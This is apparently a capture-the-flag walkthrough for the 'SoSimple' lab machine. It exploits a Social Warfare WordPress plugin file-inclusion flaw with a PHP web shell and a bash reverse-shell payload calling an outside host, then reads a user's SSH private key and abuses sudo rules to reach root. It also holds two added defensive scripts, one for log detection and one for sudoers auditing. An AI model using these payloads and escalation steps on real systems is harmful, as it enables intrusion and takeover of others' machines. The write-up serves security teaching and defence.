pg-sosimple-play

Exploitation Guide for SoSimple
Summary

This machine is exploited via a remote code execution vulnerability in the Social Warfare WordPress plugin. It is escalated by leaking a private SSH key of a user, followed by abusing misconfigured sudo permissions.
Enumeration
Nmap

We start off by running an nmap scan:

kali@kali:~# sudo nmap 192.168.120.192
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-21 22:51 EDT
Nmap scan report for 192.168.120.192
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Dirb

Using dirb, we can brute force web directories to reveal /wordpress.

kali@kali:~# dirb http://192.168.120.192/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Aug 21 22:54:51 2020
URL_BASE: http://192.168.120.192/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.120.192/ ----
+ http://192.168.120.192/index.html (CODE:200|SIZE:495)
+ http://192.168.120.192/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.120.192/wordpress/
...

Web Enumeration

Our next step is to run wpscan to see if we can identify any vulnerabilities and any usernames.

kali@kali:~# wpscan --url http://192.168.120.192/wordpress/ --enumerate p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.120.192/wordpress/ [192.168.120.192]
[+] Started: Fri Aug 21 23:27:01 2020

Interesting Finding(s):

...

[+] social-warfare
| Location: http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/
| Last Updated: 2020-08-18T17:05:00.000Z
| [!] The version is out of date, the latest version is 4.1.0
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Comment (Passive Detection)
|
| Version: 3.5.0 (100% confidence)
| Found By: Comment (Passive Detection)
| - http://192.168.120.192/wordpress/, Match: 'Social Warfare v3.5.0'
| Confirmed By:
| Query Parameter (Passive Detection)
| - http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.0
| - http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.0
| Readme - Stable Tag (Aggressive Detection)
| - http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/readme.txt

We can see wpscan identified the social-warfare plugin and the version detected is 3.5.0.
Exploitation
Social Warfare Remote Code Execution

Searching for Social Warfare on Exploit Database, we find an entry detailing a Remote File Inclusion vulnerability in the plugin.

To exploit the plugin we will first create the following PHP web shell and save it as payload.txt.

<pre>system($_REQUEST['cmd'])</pre>

Next we need to host this file over HTTP as follows.

kali@kali:~# sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …

We can now download and run the exploit, appending &cmd=id to run our command.

kali@kali:~# python exploit.py -t http://192.168.120.192/wordpress/ --payload-uri http://kali/payload.txt\&cmd\=id
[>] Sending Payload to System!
[*] Received Response From Server!
[<] Received:
uid=33(www-data) gid=33(www-data) groups=33(www-data)


┌──(kali㉿puckie)-[~/offsec/sosimple]
└─$ cat payload.txt
<pre>system("bash -c 'bash -i >& /dev/tcp/192.168.49.207/8080 0>&1'")</pre>

┌──(kali㉿puckie)-[~/offsec/sosimple]
└─$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.207.78 - - [23/Sep/2021 10:25:49] "GET /payload.txt?swp_debug=get_user_options HTTP/1.0" 200 -

Then, logged in to WordPress as max, we visit http://192.168.207.78/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.49.207/payload.txt

and use a Netcat handler to catch the shell.

┌──(kali㉿puckie)-[~/offsec]
└─$ nc -nlvp 8080
listening on [any] 8080 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.78] 53318
bash: cannot set terminal process group (922): Inappropriate ioctl for device
bash: no job control in this shell
www-data@so-simple:/var/www/html/wordpress/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@so-simple:/var/www/html/wordpress/wp-admin$
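As an added detection example (not part of this walkthrough or of the plugin's code), the following Python scans web-server access-log lines for requests to admin-post.php that set swp_debug=load_options with an swp_url pointing at a host other than the site's own, which is the request shape shown above. The log lines are constructed, and own_hosts is an assumed parameter naming the site's own hostnames.

```python
import re
from urllib.parse import parse_qs, urlparse

# Combined-format access-log line: client ip, timestamp, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def social_warfare_rfi_hits(lines, own_hosts=()):
    """Return one record per request that makes the Social Warfare debug loader fetch an
    external URL: admin-post.php with swp_debug=load_options and an swp_url whose host is
    not in own_hosts (the site's own names, which an administrator's traffic may use)."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or "admin-post.php" not in m.group("target"):
            continue
        qs = parse_qs(urlparse(m.group("target")).query)
        if qs.get("swp_debug") != ["load_options"] or "swp_url" not in qs:
            continue
        remote = urlparse(qs["swp_url"][0])
        if remote.scheme in ("http", "https") and remote.hostname not in own_hosts:
            hits.append({"client": m.group("ip"), "when": m.group("ts"),
                         "fetched": qs["swp_url"][0], "status": int(m.group("status"))})
    return hits

# Constructed sample: a routine admin-post request, a load_options fetch from the site's own
# host, and one shaped like the request shown above (external swp_url).
SAMPLE_LOG = """\
10.0.0.5 - - [23/Sep/2021:10:24:03 +0000] "GET /wordpress/wp-admin/admin-post.php?action=save HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [23/Sep/2021:10:25:10 +0000] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.207.78/wp-content/uploads/opts.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.49.207 - - [23/Sep/2021:10:25:49 +0000] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.49.207/payload.txt HTTP/1.1" 200 0 "-" "python-requests/2.25.1"
""".splitlines()
```

Any hit is worth an alert; a non-empty list with own_hosts set means the plugin was driven to fetch options from a host the site does not control.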

Escalation
Weak File Permissions

We’ll start our enumeration by investigating what files max has in his home folder.

www-data@so-simple:/home/max$ ls -la
ls -la
total 52
drwxr-xr-x 7 max max 4096 Aug 22 2020 .
drwxr-xr-x 4 root root 4096 Jul 12 2020 ..
lrwxrwxrwx 1 max max 9 Aug 22 2020 .bash_history -> /dev/null
-rw-r--r-- 1 max max 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 max max 3810 Jul 12 2020 .bashrc
drwx------ 2 max max 4096 Jul 12 2020 .cache
drwx------ 3 max max 4096 Jul 12 2020 .gnupg
drwxrwxr-x 3 max max 4096 Jul 12 2020 .local
-rw-r--r-- 1 max max 807 Feb 25 2020 .profile
drwxr-xr-x 2 max max 4096 Jul 14 2020 .ssh
-rw-r--r-- 1 max max 33 Sep 23 14:04 local.txt
-rw-r--r-- 1 max max 49 Jul 12 2020 personal.txt
drwxrwxr-x 3 max max 4096 Jul 12 2020 this
-rwxr-x--- 1 max max 43 Aug 22 2020 user.txt
www-data@so-simple:/home/max$

The .ssh directory is readable by everyone, and the private key inside it looks legitimate, so we'll copy it to our Kali machine.

www-data@so-simple:/home/max$ cat .ssh/id_rsa
cat .ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
www-data@so-simple:/home/max$

We can then login as max using the private key.

kali@kali:~# ssh -i id_rsa max@192.168.120.192
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)
...
max@so-simple:~$ id
uid=1000(max) gid=1000(max) groups=1000(max),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
max@so-simple:~$

Sudo Abuse

To get root access we’ll first see if max has access to run anything with sudo.

max@so-simple:~$ sudo -l
Matching Defaults entries for max on so-simple:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User max may run the following commands on so-simple:
(steven) NOPASSWD: /usr/sbin/service

It looks like we can run /usr/sbin/service as steven without needing a password. If we look at the entry for service on GTFOBins, we can exploit this to get a shell as steven.

max@so-simple:~$ sudo -u steven /usr/sbin/service ../../bin/bash
steven@so-simple:/$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)

Continuing down this path we’ll check if steven can run anything with sudo as well.

steven@so-simple:/$ sudo -l
Matching Defaults entries for steven on so-simple:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User steven may run the following commands on so-simple:
(root) NOPASSWD: /opt/tools/server-health.sh

It appears we can run a script located at /opt/tools/server-health.sh as root without requiring a password. If we try to access this file, we find that it doesn't exist.

steven@so-simple:/$ ls -lah /opt/tools/server-health.sh
ls: cannot access '/opt/tools/server-health.sh': No such file or directory
steven@so-simple:/$ ls -lah /opt/tools
ls: cannot access '/opt/tools': No such file or directory
steven@so-simple:/$ ls -lah /opt
total 8.0K
drwxr-xr-x 2 steven steven 4.0K Jul 13 21:06 .
drwxr-xr-x 20 root root 4.0K Aug 14 10:57 ..

Fortunately, it looks like steven has write access to /opt, so we can simply create the file and then execute it as root.

steven@so-simple:/$ mkdir /opt/tools
steven@so-simple:/$ echo "/bin/bash" > /opt/tools/server-health.sh
steven@so-simple:/$ chmod +x /opt/tools/server-health.sh
steven@so-simple:/$ sudo /opt/tools/server-health.sh
root@so-simple:/# id
uid=0(root) gid=0(root) groups=0(root)
root@so-simple:/#

Explained

root@so-simple:/home/max# cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root ALL=(ALL:ALL) ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
#%sudo ALL=(ALL:ALL) ALL
max ALL=(steven) NOPASSWD: /usr/sbin/service
steven ALL=(root) NOPASSWD: /opt/tools/server-health.sh

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d
root@so-simple:/home/max#
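As an added defensive check (not part of this walkthrough), the following Python parses sudoers user-spec lines and flags the two conditions this box combines: a command that does not exist yet, and a path component owned or writable by a non-root user. The filesystem snapshot is constructed from the listing above; on a live host, call audit(text) without a lookup and os.stat is used.

```python
import os
import re
import stat

# One sudoers user-spec line, e.g. "steven ALL=(root) NOPASSWD: /opt/tools/server-health.sh"
RULE_RE = re.compile(r"^(?P<user>\S+)\s+\S+=\((?P<runas>[^)]*)\)\s*(?:[A-Z]+:\s*)*(?P<cmds>.+)$")

def parse_sudoers(text):
    """Yield (user, runas, command) per user-spec line; comments and Defaults are skipped."""
    for raw in text.splitlines():
        m = RULE_RE.match(raw.split("#", 1)[0].strip())  # drops comments and #include lines
        if m and m.group("user") != "Defaults":
            for cmd in m.group("cmds").split(","):
                yield m.group("user"), m.group("runas"), cmd.split()[0]

def command_weaknesses(cmd, lookup):
    """lookup(path) -> (owner_uid, st_mode) or None; flags a missing target and any parent a non-root user can alter."""
    if cmd == "ALL":
        return ["ALL: unrestricted"]
    findings = []
    if lookup(cmd) is None:
        findings.append(cmd + " does not exist: whoever can write its parent supplies it")
    path = cmd
    while True:  # walk from the command up to /, checking owner and group/world write bits
        info = lookup(path)
        if info and (info[0] != 0 or info[1] & (stat.S_IWGRP | stat.S_IWOTH)):
            findings.append("%s modifiable by non-root (uid %d, mode %o)" % (path, info[0], stat.S_IMODE(info[1])))
        parent = os.path.dirname(path)
        if parent == path:
            return findings
        path = parent

def audit(text, lookup=None):
    """Return {(user, runas, command): [findings]}; lookup defaults to os.stat on this host."""
    def live(path):
        try:
            st = os.stat(path)
        except FileNotFoundError:
            return None
        return st.st_uid, st.st_mode
    return {(u, r, c): command_weaknesses(c, lookup or live) for u, r, c in parse_sudoers(text)}

# Constructed snapshot mirroring the listing above: /opt is owned by steven (uid 1001),
# /opt/tools is absent, everything else is root-owned and not group/world writable.
SAMPLE_FS = {"/": (0, 0o40755), "/usr": (0, 0o40755), "/usr/sbin": (0, 0o40755),
             "/usr/sbin/service": (0, 0o100755), "/opt": (1001, 0o40755)}
SAMPLE_SUDOERS = """max ALL=(steven) NOPASSWD: /usr/sbin/service
steven ALL=(root) NOPASSWD: /opt/tools/server-health.sh
#includedir /etc/sudoers.d
"""
```

The steven rule is reported twice (missing target, non-root-owned /opt), which is the fix: create the script as root under a root-owned directory, or drop the rule.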

